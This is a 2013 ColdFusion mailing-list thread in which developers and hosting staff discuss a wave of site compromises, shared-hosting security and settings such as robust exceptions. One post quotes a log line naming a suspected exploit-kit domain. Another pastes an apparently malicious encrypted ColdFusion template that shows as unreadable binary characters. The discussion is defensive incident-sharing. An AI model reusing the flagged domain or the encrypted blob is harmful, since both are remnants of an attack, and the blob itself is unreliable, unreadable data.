RE: New Round of Exploits going on

2013-02-15 Thread Revolution 

Why not just get your own server.



-Original Message-
From: Russ Michaels [mailto:r...@michaels.me.uk] 
Sent: Tuesday, February 12, 2013 5:54 AM
To: cf-talk
Subject: Re: New Round of Exploits going on


Byron,

That is partly true, if you make certain assumptions, but things are not
quite that simple, considering the following.

Let say you get your own server to host your own site.
And that is it, you do not do any kind of lockdown, do not keep your patches
and hotfixes up to date, do no monitoring what so ever.
Then yes in such a scenario the shared server will  be safer in general
because your server as a whole is not secure, so a vulnerability on the
server is more likely.
So getting a server with no idea what your doing and no management or
support, would be pretty dumb. If you do not have the skills to manage it
yourself and make sure it is secure then you should be paying you host or
someone else to do this for you.


However if you are running a server with *ONLY* your own site on it, your
chances of being attacked in the first place are much less than a shared
server, Consider that a shared server is going to have *AT LEAST* 200 other
sites on it, probably more, and attackers generally target a list of
domains/websites rather than the server itself when looking for
vulnerabilities, so that is a 20,000% increase in your chances of being
hacked due to other websites on the server already

Lets also consider that your own site is written in CF, and so CF is the
only thing you would have installed on your own server.
So you only have one application layer attack vector.
But on a shared server your also going to have ASP, .NET, Perl, PHP, Ruby
and probably more, so that has just increased the possible attack vectors by
at least another 500%





On Tue, Feb 12, 2013 at 6:37 AM, Byron Mann byronos...@gmail.com wrote:


 (apologies for the length)

 Russ,

 I can tell by your comments that you either have dealt with a lot of 
 hosts or have worked or owned one. Well said.

 Having worked in the Hosting space for more than 10 years now, I can 
 safely say there is absolutely no 100% way to prevent these exploits 
 on any platform.

 That is not to say there are not more secure options than shared 
 hosting, but even at that you may need the above average skill set. I 
 can make an argument that shared CF hosting is probably more secure 
 for half the people using Coldfusion out there.

 How and why?

 Well most probably have no one actively monitoring their servers. Not 
 only do we have ourselves and tools looking at the servers, but our 
 customers who make us instantly aware of an issue.

 Even a subpar host probably has a better lock down on CF than many non 
 host managed CF users.

 How many can say they don't have root kits (or even know what that is) 
 running on their server? Probably a lot on this list, but the average 
 vps, cloud or dedicated user out there, ummm probably not.

 Example, there was a recent issue we had with hidden elements being 
 injected to files on a shared server. This was actually a customer 
 running Wordpress. How many out there would have found that and how 
 quickly, say on a dedicated server with a site that only gets updated once
a month.

 The best you can do is be vigilant, do your patching and homework and 
 when the next compromise comes, take it on the cheek, mitigate, and 
 take what you learned and try to improve for the next go around.

 And if you are a hosting customer, it's up to you to be aware and 
 educated on what a host should and shouldn't be doing (aka this list). 
 And then decide if it's time to move on or acceptable to you.

 Of course I'm speaking in general terms, as this is the case with not 
 only CF, but all platforms. How many times a week do we hear about a 
 drupal or Wordpress issue, just about as often as CF, but if not more.

 Quick fact, we have more dedicated, vps, cloud (vms) revenue effected 
 by compromises than our shared customers.

 But let's not all forget the real problem here. It's not cf users, the 
 host or Adobe's fault. It's the dirt bags out there who make 
 escalations happen that result in the 3 am phone calls.

 Byron Mann
 Lead Engineer  Architect
 HostMySite.com


 



~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354530
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

RE: New Round of Exploits going on

2013-02-15 Thread Stephens, Larry V 

Maybe, money?

 

-Original Message-
From: Revolution [mailto:houseoffusion_...@internetemail.info] 
Sent: Friday, February 15, 2013 7:56 AM
To: cf-talk
Subject: RE: New Round of Exploits going on


Why not just get your own server.



-Original Message-
From: Russ Michaels [mailto:r...@michaels.me.uk] 
Sent: Tuesday, February 12, 2013 5:54 AM
To: cf-talk
Subject: Re: New Round of Exploits going on


Byron,

That is partly true, if you make certain assumptions, but things are not
quite that simple, considering the following.

Let say you get your own server to host your own site.

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354535
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

RE: New Round of Exploits going on

2013-02-15 Thread Russ Michaels 

And skills, did you actually read the discussion?

Regards
Russ Michaels
www.michaels.me.uk
www.cfmldeveloper.com - Free CFML hosting for developers
www.cfsearch.com - CF search engine
On Feb 15, 2013 9:13 PM, Stephens, Larry V steph...@iu.edu wrote:


 Maybe, money?



 -Original Message-
 From: Revolution [mailto:houseoffusion_...@internetemail.info]
 Sent: Friday, February 15, 2013 7:56 AM
 To: cf-talk
 Subject: RE: New Round of Exploits going on


 Why not just get your own server.



 -Original Message-
 From: Russ Michaels [mailto:r...@michaels.me.uk]
 Sent: Tuesday, February 12, 2013 5:54 AM
 To: cf-talk
 Subject: Re: New Round of Exploits going on


 Byron,

 That is partly true, if you make certain assumptions, but things are not
 quite that simple, considering the following.

 Let say you get your own server to host your own site.

 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354537
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-12 Thread Russ Michaels 

Byron,

That is partly true, if you make certain assumptions, but things are not
quite that simple, considering the following.

Let say you get your own server to host your own site.
And that is it, you do not do any kind of lockdown, do not keep your
patches and hotfixes up to date, do no monitoring what so ever.
Then yes in such a scenario the shared server will  be safer in general
because your server as a whole is not secure, so a vulnerability on the
server is more likely.
So getting a server with no idea what your doing and no management or
support, would be pretty dumb. If you do not have the skills to manage it
yourself and make sure it is secure then you should be paying you host or
someone else to do this for you.


However if you are running a server with *ONLY* your own site on it, your
chances of being attacked in the first place are much less than a shared
server,
Consider that a shared server is going to have *AT LEAST* 200 other sites
on it, probably more, and attackers generally target a list of
domains/websites rather than the server itself when looking for
vulnerabilities, so that is a 20,000% increase in your chances of being
hacked due to other websites on the server already

Lets also consider that your own site is written in CF, and so CF is the
only thing you would have installed on your own server.
So you only have one application layer attack vector.
But on a shared server your also going to have ASP, .NET, Perl, PHP, Ruby
and probably more, so that has just increased the possible attack vectors
by at least another 500%





On Tue, Feb 12, 2013 at 6:37 AM, Byron Mann byronos...@gmail.com wrote:


 (apologies for the length)

 Russ,

 I can tell by your comments that you either have dealt with a lot of hosts
 or have worked or owned one. Well said.

 Having worked in the Hosting space for more than 10 years now, I can safely
 say there is absolutely no 100% way to prevent these exploits on any
 platform.

 That is not to say there are not more secure options than shared hosting,
 but even at that you may need the above average skill set. I can make an
 argument that shared CF hosting is probably more secure for half the people
 using Coldfusion out there.

 How and why?

 Well most probably have no one actively monitoring their servers. Not only
 do we have ourselves and tools looking at the servers, but our customers
 who make us instantly aware of an issue.

 Even a subpar host probably has a better lock down on CF than many non host
 managed CF users.

 How many can say they don't have root kits (or even know what that is)
 running on their server? Probably a lot on this list, but the average vps,
 cloud or dedicated user out there, ummm probably not.

 Example, there was a recent issue we had with hidden elements being
 injected to files on a shared server. This was actually a customer running
 Wordpress. How many out there would have found that and how quickly, say on
 a dedicated server with a site that only gets updated once a month.

 The best you can do is be vigilant, do your patching and homework and when
 the next compromise comes, take it on the cheek, mitigate, and take what
 you learned and try to improve for the next go around.

 And if you are a hosting customer, it's up to you to be aware and educated
 on what a host should and shouldn't be doing (aka this list). And then
 decide if it's time to move on or acceptable to you.

 Of course I'm speaking in general terms, as this is the case with not only
 CF, but all platforms. How many times a week do we hear about a drupal or
 Wordpress issue, just about as often as CF, but if not more.

 Quick fact, we have more dedicated, vps, cloud (vms) revenue effected by
 compromises than our shared customers.

 But let's not all forget the real problem here. It's not cf users, the host
 or Adobe's fault. It's the dirt bags out there who make escalations happen
 that result in the 3 am phone calls.

 Byron Mann
 Lead Engineer  Architect
 HostMySite.com


 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354474
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-11 Thread Russ Michaels 

Unfortunately Andrew things are never that simple.
For every customer like yourself who wants this turned off, there will be
100 customers who want it turned on.

Most people do not know about or care about the security side of hosting,
and just want everything enabled which makes their life easier.
So as soon as they hear the word disabled, their initial response will be
things like.
1) Our previous host did not do this
2) Then we will have to look for another host

Many hosts are i'm sure simply giving in to the demands of the majority of
their customers and providing them with the services they want even though
they are insecure.

I regularly explain to customers/developers why cfexecute is disabled, by
they do not have read/write access to the entire server, why
createobject(java) is disabled by default, and in in general why things
have to be locked down on a shared server.
We do however stick to our main security policies, so our servers are more
secure than most, but this of course comes at a cost as many customers
simply will not accept such restrictions and would rather go and find an
insecure host instead.

At the end of the day If you want security and control over your hosting
environment the solution is simple, DO NOT USE SHARED HOSTING.






On Mon, Feb 11, 2013 at 5:32 AM, Andrew Scott andr...@andyscott.id.auwrote:


 One thing I hate about some hosting companies is that they have Robust
 Exceptions switched on, but what concerns me even more is that they don't
 care that this is a security risk... If your hosting company is one of
 them, get in their ears about having it switched off.

 If they refuse then its time for a change.



--

Russ Michaels

www.bluethunderinternet.com  : Business hosting services  solutions
www.cfmldeveloper.com: ColdFusion developer community
www.michaels.me.uk   : my blog
www.cfsearch.com : ColdFusion search engine
**
*skype me* : russmichaels


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354448
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-11 Thread Andrew Scott 

Yeah I guess, but that is why there are log files so there is really no
excuse. But how cost efficient would it be to just move those people over
to their own server so they can effect themselves?

And I would bet that it is these people who also turn off UAC on Windows
and get all types of infections and could very well be the ones ftping up
infected files to begin with.

Russ, I hear you but then maybe they are better of else where if they can't
understand the implications.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels r...@michaels.me.uk wrote:


 Unfortunately Andrew things are never that simple.
 For every customer like yourself who wants this turned off, there will be
 100 customers who want it turned on.

 Most people do not know about or care about the security side of hosting,
 and just want everything enabled which makes their life easier.
 So as soon as they hear the word disabled, their initial response will be
 things like.
 1) Our previous host did not do this
 2) Then we will have to look for another host

 Many hosts are i'm sure simply giving in to the demands of the majority of
 their customers and providing them with the services they want even though
 they are insecure.

 I regularly explain to customers/developers why cfexecute is disabled, by
 they do not have read/write access to the entire server, why
 createobject(java) is disabled by default, and in in general why things
 have to be locked down on a shared server.
 We do however stick to our main security policies, so our servers are more
 secure than most, but this of course comes at a cost as many customers
 simply will not accept such restrictions and would rather go and find an
 insecure host instead.

 At the end of the day If you want security and control over your hosting
 environment the solution is simple, DO NOT USE SHARED HOSTING.




~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354449
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-11 Thread Russ Michaels 

unfortunately no host can afford to tell all their customers your better
off elsewhere.
It would not be cost efficient at all to give a shared hosting customer
their own server for the same price, they would lose money, I doubt the
cost would even be remotely covered.

Both of hose solutions would put any host out of business very quickly.


On Mon, Feb 11, 2013 at 10:37 AM, Andrew Scott andr...@andyscott.id.auwrote:


 Yeah I guess, but that is why there are log files so there is really no
 excuse. But how cost efficient would it be to just move those people over
 to their own server so they can effect themselves?

 And I would bet that it is these people who also turn off UAC on Windows
 and get all types of infections and could very well be the ones ftping up
 infected files to begin with.

 Russ, I hear you but then maybe they are better of else where if they can't
 understand the implications.


 --
 Regards,
 Andrew Scott
 WebSite: http://www.andyscott.id.au/
 Google+:  http://plus.google.com/113032480415921517411


 On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels r...@michaels.me.uk
 wrote:

 
  Unfortunately Andrew things are never that simple.
  For every customer like yourself who wants this turned off, there will be
  100 customers who want it turned on.
 
  Most people do not know about or care about the security side of hosting,
  and just want everything enabled which makes their life easier.
  So as soon as they hear the word disabled, their initial response will
 be
  things like.
  1) Our previous host did not do this
  2) Then we will have to look for another host
 
  Many hosts are i'm sure simply giving in to the demands of the majority
 of
  their customers and providing them with the services they want even
 though
  they are insecure.
 
  I regularly explain to customers/developers why cfexecute is disabled, by
  they do not have read/write access to the entire server, why
  createobject(java) is disabled by default, and in in general why things
  have to be locked down on a shared server.
  We do however stick to our main security policies, so our servers are
 more
  secure than most, but this of course comes at a cost as many customers
  simply will not accept such restrictions and would rather go and find an
  insecure host instead.
 
  At the end of the day If you want security and control over your hosting
  environment the solution is simple, DO NOT USE SHARED HOSTING.
 
 


 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354450
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-11 Thread Andrew Scott 

Russ, I never meant their own server. I meant put all customers who want
the robust onto the same sever.

But I did raise an enhancement with Adobe, where my suggestion is to have
robust exceptions of by default and not be able to enable or disable from
the CF admin. However if the customer wants to exploit their own site then
they have the option to turn that level of exception on in the
Application.cfc



On Tue, Feb 12, 2013 at 3:05 AM, Russ Michaels r...@michaels.me.uk wrote:


 unfortunately no host can afford to tell all their customers your better
 off elsewhere.
 It would not be cost efficient at all to give a shared hosting customer
 their own server for the same price, they would lose money, I doubt the
 cost would even be remotely covered.

 Both of hose solutions would put any host out of business very quickly.


 On Mon, Feb 11, 2013 at 10:37 AM, Andrew Scott andr...@andyscott.id.au
 wrote:

 
  Yeah I guess, but that is why there are log files so there is really no
  excuse. But how cost efficient would it be to just move those people over
  to their own server so they can effect themselves?
 
  And I would bet that it is these people who also turn off UAC on Windows
  and get all types of infections and could very well be the ones ftping up
  infected files to begin with.
 
  Russ, I hear you but then maybe they are better of else where if they
 can't
  understand the implications.
 
 
  --
  Regards,
  Andrew Scott
  WebSite: http://www.andyscott.id.au/
  Google+:  http://plus.google.com/113032480415921517411
 
 
  On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels r...@michaels.me.uk
  wrote:
 
  
   Unfortunately Andrew things are never that simple.
   For every customer like yourself who wants this turned off, there will
 be
   100 customers who want it turned on.
  
   Most people do not know about or care about the security side of
 hosting,
   and just want everything enabled which makes their life easier.
   So as soon as they hear the word disabled, their initial response
 will
  be
   things like.
   1) Our previous host did not do this
   2) Then we will have to look for another host
  
   Many hosts are i'm sure simply giving in to the demands of the majority
  of
   their customers and providing them with the services they want even
  though
   they are insecure.
  
   I regularly explain to customers/developers why cfexecute is disabled,
 by
   they do not have read/write access to the entire server, why
   createobject(java) is disabled by default, and in in general why things
   have to be locked down on a shared server.
   We do however stick to our main security policies, so our servers are
  more
   secure than most, but this of course comes at a cost as many customers
   simply will not accept such restrictions and would rather go and find
 an
   insecure host instead.
  
   At the end of the day If you want security and control over your
 hosting
   environment the solution is simple, DO NOT USE SHARED HOSTING.
  
  
 
 
 

 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354452
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-11 Thread Russ Michaels 

I would not think that is a cost effective solution either as there is such
a small number of customers who would request to be on a secure server.
We offer something like that called semi-dedicated, but it is more
expensive.

If CF had a web admin like Railo, it would solve all those type of issues
really.


On Mon, Feb 11, 2013 at 4:21 PM, Andrew Scott andr...@andyscott.id.auwrote:


 Russ, I never meant their own server. I meant put all customers who want
 the robust onto the same sever.

 But I did raise an enhancement with Adobe, where my suggestion is to have
 robust exceptions of by default and not be able to enable or disable from
 the CF admin. However if the customer wants to exploit their own site then
 they have the option to turn that level of exception on in the
 Application.cfc



 On Tue, Feb 12, 2013 at 3:05 AM, Russ Michaels r...@michaels.me.uk
 wrote:

 
  unfortunately no host can afford to tell all their customers your better
  off elsewhere.
  It would not be cost efficient at all to give a shared hosting customer
  their own server for the same price, they would lose money, I doubt the
  cost would even be remotely covered.
 
  Both of hose solutions would put any host out of business very quickly.
 
 
  On Mon, Feb 11, 2013 at 10:37 AM, Andrew Scott andr...@andyscott.id.au
  wrote:
 
  
   Yeah I guess, but that is why there are log files so there is really no
   excuse. But how cost efficient would it be to just move those people
 over
   to their own server so they can effect themselves?
  
   And I would bet that it is these people who also turn off UAC on
 Windows
   and get all types of infections and could very well be the ones ftping
 up
   infected files to begin with.
  
   Russ, I hear you but then maybe they are better of else where if they
  can't
   understand the implications.
  
  
   --
   Regards,
   Andrew Scott
   WebSite: http://www.andyscott.id.au/
   Google+:  http://plus.google.com/113032480415921517411
  
  
   On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels r...@michaels.me.uk
   wrote:
  
   
Unfortunately Andrew things are never that simple.
For every customer like yourself who wants this turned off, there
 will
  be
100 customers who want it turned on.
   
Most people do not know about or care about the security side of
  hosting,
and just want everything enabled which makes their life easier.
So as soon as they hear the word disabled, their initial response
  will
   be
things like.
1) Our previous host did not do this
2) Then we will have to look for another host
   
Many hosts are i'm sure simply giving in to the demands of the
 majority
   of
their customers and providing them with the services they want even
   though
they are insecure.
   
I regularly explain to customers/developers why cfexecute is
 disabled,
  by
they do not have read/write access to the entire server, why
createobject(java) is disabled by default, and in in general why
 things
have to be locked down on a shared server.
We do however stick to our main security policies, so our servers are
   more
secure than most, but this of course comes at a cost as many
 customers
simply will not accept such restrictions and would rather go and find
  an
insecure host instead.
   
At the end of the day If you want security and control over your
  hosting
environment the solution is simple, DO NOT USE SHARED HOSTING.
   
   
  
  
  
 
 

 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354456
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-11 Thread Matthew Williams 

IF, and it's a large IF, but IF you're willing to maintain your own 
machine than a slicehost with an open source CFML engine isn't all that 
much more expensive than a shared hosting plan.  For $20 USD a month you 
can have a linode running whatever flavor of headless linux that you 
want.  Throw on Webmin/Virtualmin to handle site creation and updates.  
Throw on Railo on Tomcat.  MySQL for DB, apache to serve web traffic.  
Use IPTables to lockdown all but SSH/HTTP/HTTPS/FTP/DNS.  Virtualmin can 
be set to automatically check for package updates and deploy them on a 
set schedule.  It can backup to an S3 bucket.  Railo can be set to 
update automatically as well.  Everything that is running is basically 
free, it's just going to cost you in time if you're not familiar with it.

Now, the cost in time for setup?  That's going to be higher than just 
going with a shared host, but I personally found that my time is far 
offset against dealing with the latest issues that have come up with 
vulnerabilities.

NOTE: this doesn't address PCI compliance as I've not had to go down 
that route.  In that instance shared may still yet be cheaper, but given 
the prices I've seen on shared hosts that are PCI compliant, I still 
think it'd be cheaper to roll your own.  But then, I'm able to do the 
admin and dev side of things.

-- 
Matthew Williams
Geodesic GraFX
www.geodesicgrafx.com/blog
twitter.com/ophbalance


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354457
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-11 Thread Leigh 

 Les Mizzell wrote:
 So, anybody know what this is doing?
 Allaire Cold Fusion Template

Something similar came up on StackOverflow last week (possibly the same 
exploit). That guy said the old AB Positive Encrypt and Decrypt utility was 
able to decrypt the file:
http://www.adobe.com/cfusion/exchange/index.cfm?event=extensionDetailextid=1007043

-Leigh




~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354458
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-11 Thread Andrew Scott 

Well I guess the ticket I raised is too late


One can already do this


cfset this.enablerobustexception = true /





On Tue, Feb 12, 2013 at 3:53 AM, Leigh cfsearch...@yahoo.com wrote:


  Les Mizzell wrote:
  So, anybody know what this is doing?
  Allaire Cold Fusion Template

 Something similar came up on StackOverflow last week (possibly the same
 exploit). That guy said the old AB Positive Encrypt and Decrypt utility was
 able to decrypt the file:

 http://www.adobe.com/cfusion/exchange/index.cfm?event=extensionDetailextid=1007043

 -Leigh




 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354468
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-11 Thread Byron Mann 

(apologies for the length)

Russ,

I can tell by your comments that you either have dealt with a lot of hosts
or have worked or owned one. Well said.

Having worked in the Hosting space for more than 10 years now, I can safely
say there is absolutely no 100% way to prevent these exploits on any
platform.

That is not to say there are not more secure options than shared hosting,
but even at that you may need the above average skill set. I can make an
argument that shared CF hosting is probably more secure for half the people
using Coldfusion out there.

How and why?

Well most probably have no one actively monitoring their servers. Not only
do we have ourselves and tools looking at the servers, but our customers
who make us instantly aware of an issue.

Even a subpar host probably has a better lock down on CF than many non host
managed CF users.

How many can say they don't have root kits (or even know what that is)
running on their server? Probably a lot on this list, but the average vps,
cloud or dedicated user out there, ummm probably not.

Example, there was a recent issue we had with hidden elements being
injected to files on a shared server. This was actually a customer running
Wordpress. How many out there would have found that and how quickly, say on
a dedicated server with a site that only gets updated once a month.

The best you can do is be vigilant, do your patching and homework and when
the next compromise comes, take it on the cheek, mitigate, and take what
you learned and try to improve for the next go around.

And if you are a hosting customer, it's up to you to be aware and educated
on what a host should and shouldn't be doing (aka this list). And then
decide if it's time to move on or acceptable to you.

Of course I'm speaking in general terms, as this is the case with not only
CF, but all platforms. How many times a week do we hear about a drupal or
Wordpress issue, just about as often as CF, but if not more.

Quick fact, we have more dedicated, vps, cloud (vms) revenue effected by
compromises than our shared customers.

But let's not all forget the real problem here. It's not cf users, the host
or Adobe's fault. It's the dirt bags out there who make escalations happen
that result in the 3 am phone calls.

Byron Mann
Lead Engineer  Architect
HostMySite.com


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354470
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

New Round of Exploits going on

2013-02-10 Thread Andrew Scott 

It appears that there are either Web Developers running sites with current
infections, or there is a new round happening.

I have seen one site hacked twice in the last two weeks, and although they
were never able to run the code, there is very little evidence that this
exploit is from the web site it was found on.

However the one thing that I noticed in the logs at the time of the
modified HTML file, and yes they only modified HTML files and not CFML
files, was that I found a HEAD request in the logs that came from a website
that looked suspicious. When I googled this domain my AntiVirus detected
this as a Black Hole Security Exploit, but what was worrying was that this
log with the domain had the website that was hacked in the log. And it
looks like this with the details changed to protect both parties.

2013-02-06 01:43:48 xxx.xxx.xxx.xxx HEAD / - 80 - xxx.xxx.xxx.xxx
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0
http://somedomain/?info/d http://luhafaki.eg.vg/?info/andyscott.id.au
omainattacked 301 0 0 225 432 125

Now you can see that this was redirected, but if there is a known exploit
these guys are still able to do this. As was evident with the latest
Anonymous attacks.

I encourage people to look at their websites and check to see if they have
been infected with this new wave. I have gone through the logs of the
website in question and there is no evidence that it was infected directly
through the website, except for that one line in the log mentioned above.

What really shocks me even more, is that the hosting company refuse
to acknowledge that they may be responsible, which is fair enough if this
website did not have all the checks to sanitize all form inputs with Anti
Sammy. And there is also no evidence that this a SQL Injected attack
either, which is near impossible unless there is a known bug with hibernate
and its current binding of variables. Aka cfqueryparam for hibernate.

Anyway as some people have mentioned that they have been attacked in the
last few weeks, I wanted to share this as there seems to be a new exploit
going around that may or may not be related to ColdFusion on shared hosts,
but they seem to not care who they are infecting.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354443
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-10 Thread Les Mizzell 

I just got the below on a site. Not sure how to decrypt to tell exactly 
what it's doing though.
Client noticed that Google had flagged the site as 'comprimised.

I'm pointing my finger at the hosting company - they've got a security 
issue if this can happen, correct?

So, anybody know what this is doing?

-

Allaire Cold Fusion Template
Header Size: New 
Version@ؤlº²BÊulYLöŠhqؤä8X°ɿÌò©‰P^qvßNÊ҇ùFÍû'ÉÊՔ¯Èe
ÜØúÄá”û!Çp$s㨒ôû”\v‰ùeÐ×åRV/е ú{ 
/ý‡èó^t¼ɮ?žÝtnŠö”³zñ¤î:XÌ֙Ó(ËÕÂ~)ۣ·Œ*‹ 
ì€ 
·mîQPêlœ­wré(²-ì˜~s ‡#ó(B]±nwÃí¸•a TGm­æalW][÷* 
Iû(þºú¢ہ@”‰Íþk äF±‰î®l‘XFLõR±, 
҂…¹ԁ(]{šÁK~9î®l‘XFLõR±, ˜éâ¡[V8cü_èQK^ 
¦[AêÝ׻áº8'¹ïVŒcKWÅéÁÖU€hL½
.øá¡R¾ÒWxþ™öî®l‘XFLõR±, ˜TXÉÅ8Öëx«Ç=! 
䱞Wܳ§›YªØå«#}yµ'X› 
X·šæNåVÆͼ¿%V#‚6ŸÂ7Ì 
OÊ)€æ*#pPOëPpŒžWܳ§›YªØåÅO“TFÀe„› X·ð
ëo2]ƒͼ¿%V#‚6ŸÂ7Ì 
‡áqtÙu!qö¬òˆ:Ã'H—Nî®l‘XFLõR±, 
ʍƬ³š,’8rR+áœ;¦fTm{$5fIHpOÕÏ-K©o+ÏE$f*훆œv™ÔB¥¦fTm{$5fIHpOÕ@¥ÉϚ~y`lÆjÃ0z\¸ÿꬃ©ô³¥pEߵÒ/HÊÝS¸¿-ؕ3úœ¼äU³ÐÁ׻áº8'¹ïVŒcKWN¡sdDg‘ÑùAjƒ¥×y³Õ¿°Ó{Kî®l‘XFLõR±,
 
•ñ*Þr„?ݮ—Év¬ì‘Íg¡$Â9„î®l‘XFLõR±, 
:6ôԸTœ¼}ÝbG¦`ðî¦fTm{$5fIHpOÕ8`Ӆº2Öяÿ¬@àÎ}V|̽…
\¸ÿꬃ©ô³¥pEߵÒ/ŊԽæCϯ£’jKNö׻áº8'¹ïVŒcKWì¾ïNüÏ1¨--£s©sK‹ðåW׻áº8'¹ïVŒcKWá?‹ÍÍ›
 
X·TôÒ^©ª»`ͼ¿%V#‚6ŸÂ7Ì Â}£d
½¬p!²E¤ñߴdŠ`'8OYgՊ=â/n׻áº8'¹ïVŒcKWRÏ¥t‘‘› 
X·fJc—lþ¸fͼ¿%V#‚6ŸÂ7Ì ‡ը
R,`Î޷M^Rœ¯ê}Oæ‘Ìͼ¿%V#‚6ŸÂ7Ì 
Íi7pԳ´¯ˆš¢ÿ*\¸ÿꬃ©ô³¥pEߵÒ/ðu§½(OÍ祹Í3 
ÕpÓÜæ7\¸ÿꬃ©ô³¥pEߵÒ/gQ 
ú÷缋ýquv6TžWܳ§›YªØåY~’›¡Xm»¸ã4ÿöèyoy@QvUcS`׻áº8'¹ïVŒcKWg“SáÑÓ›
 
X·Dü¥Ñíöͼ¿%V#‚6ŸÂ7Ì 
•#âvû±‰â8³GԞWܳ§›YªØåY~’›¡Xm»ʍƬ³š,}B½à
s­¦fTm{$5fIHpOÕddÜ 
šµ'×l—˜ҽrm[,
Ìå;ò:WÄçåöbyœ©E 
¦¨Y!Æ#šÅ
